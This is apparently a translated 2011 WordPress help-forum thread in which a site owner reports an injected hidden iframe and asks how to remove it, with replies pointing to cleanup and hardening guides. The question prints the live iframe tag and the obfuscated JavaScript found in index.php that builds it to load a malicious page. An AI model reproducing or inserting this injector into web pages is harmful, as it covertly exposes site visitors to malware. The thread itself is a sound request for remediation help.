恶意脚本正被附加到我的标记中。帮助?

时间:2011-08-14 作者:John

在我的网站上,正在添加以下脚本:

<iframe width="1" height="1" frameborder="0" src="http://hysofufewobe.com/k985ytv.htm">
我尝试在WP安装目录中的每个文件中搜索“hysofufewobe”,但没有结果,因此代码可能被混淆了。

我不确定是WordPress还是我的主持人DreamHost出了问题。我已经联系了我的主人,询问是否有关于类似问题的报告。尚未答复。我想我会在这期间问你。

有人知道我可以采取什么步骤来摆脱这个脚本吗?

顺便说一下,我在这里写了另一个关于这个问题的帖子,但由于某种原因,我无法访问它。如果需要,请随时删除该文件。

-编辑-我已选中/索引。php和wp管理/索引。php,并在<?php.

mv=\'uf\';jx=\'tv.\';cg=\'me\';k=\'e\';mg=\'rc\';g=\'ys\';rs=\'m\';f=\'of\';m=\'ht\';u=\'85y\';ca=\'e.c\';r=\'s\';j=\'fra\';i=\'ht\';h=\'//h\';qy=\'wob\';v=\'k9\';a=\'t\';qt=\'i\';br=\'p:\';s=\'om/\';ul=qt.concat(j,cg);xl=r.concat(mg);xp=m.concat(a,br,h,g,f,mv,k,qy,ca,s,v,u,jx,i,rs);var bn=document.createElement(ul);bn.setAttribute(\'width\',\'1\');bn.setAttribute(\'height\',\'1\');bn.frameBorder=0;bn.setAttribute(xl,xp);document.body.appendChild(bn);
所以我删除了它,一切看起来都恢复正常了。脚本也不会附加到我的标记中。我怀疑仅仅删除这些行就可以解决整个问题,但我不知道如何检查。有什么想法吗?

4 个回复
SO网友:Rarst

看见FAQ My site was hacked 在Codex中,但实际上,除非你完全相信自己可以处理检查/清理/保护自己,否则你唯一剩下的选择就是找人/雇人来做这件事。

SO网友:Rick d

我在10个不同的网站上都有相同的问题,这些网站今天都被点击了(不是所有的wordpress),并且由相同的代码组成。我对此的最佳猜测是,我的本地计算机上有恶意软件,它使用我的FTP客户端感染我的网站。

我在FTP客户端中存储密码不好。我从中吸取了教训。

获取良好的恶意软件扫描工具,更改网站的所有密码。不要在FTP客户端中存储密码。

SO网友:Tara

有用的链接:

http://codex.wordpress.org/FAQ_My_site_was_hackedhttp://wordpress.org/support/topic/268083#post-1065779http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/http://ottopress.com/2009/hacked-wordpress-backdoors/

然后实施本指南的提示:http://codex.wordpress.org/Hardening_WordPress

SO网友:Wayne Huang

我们在这里的博客中写到了这一波攻击。看看吧!

(moderator note) 这被标记并报告为包含恶意软件的网站。我不认为扫描会对实际的实时恶意软件做出反应(网站会警告误报),但输入的风险由您自己承担。

_http://blog.armorize.com/2011/08/k985ytvhtm-fake-antivirus-mass.html

结束

相关推荐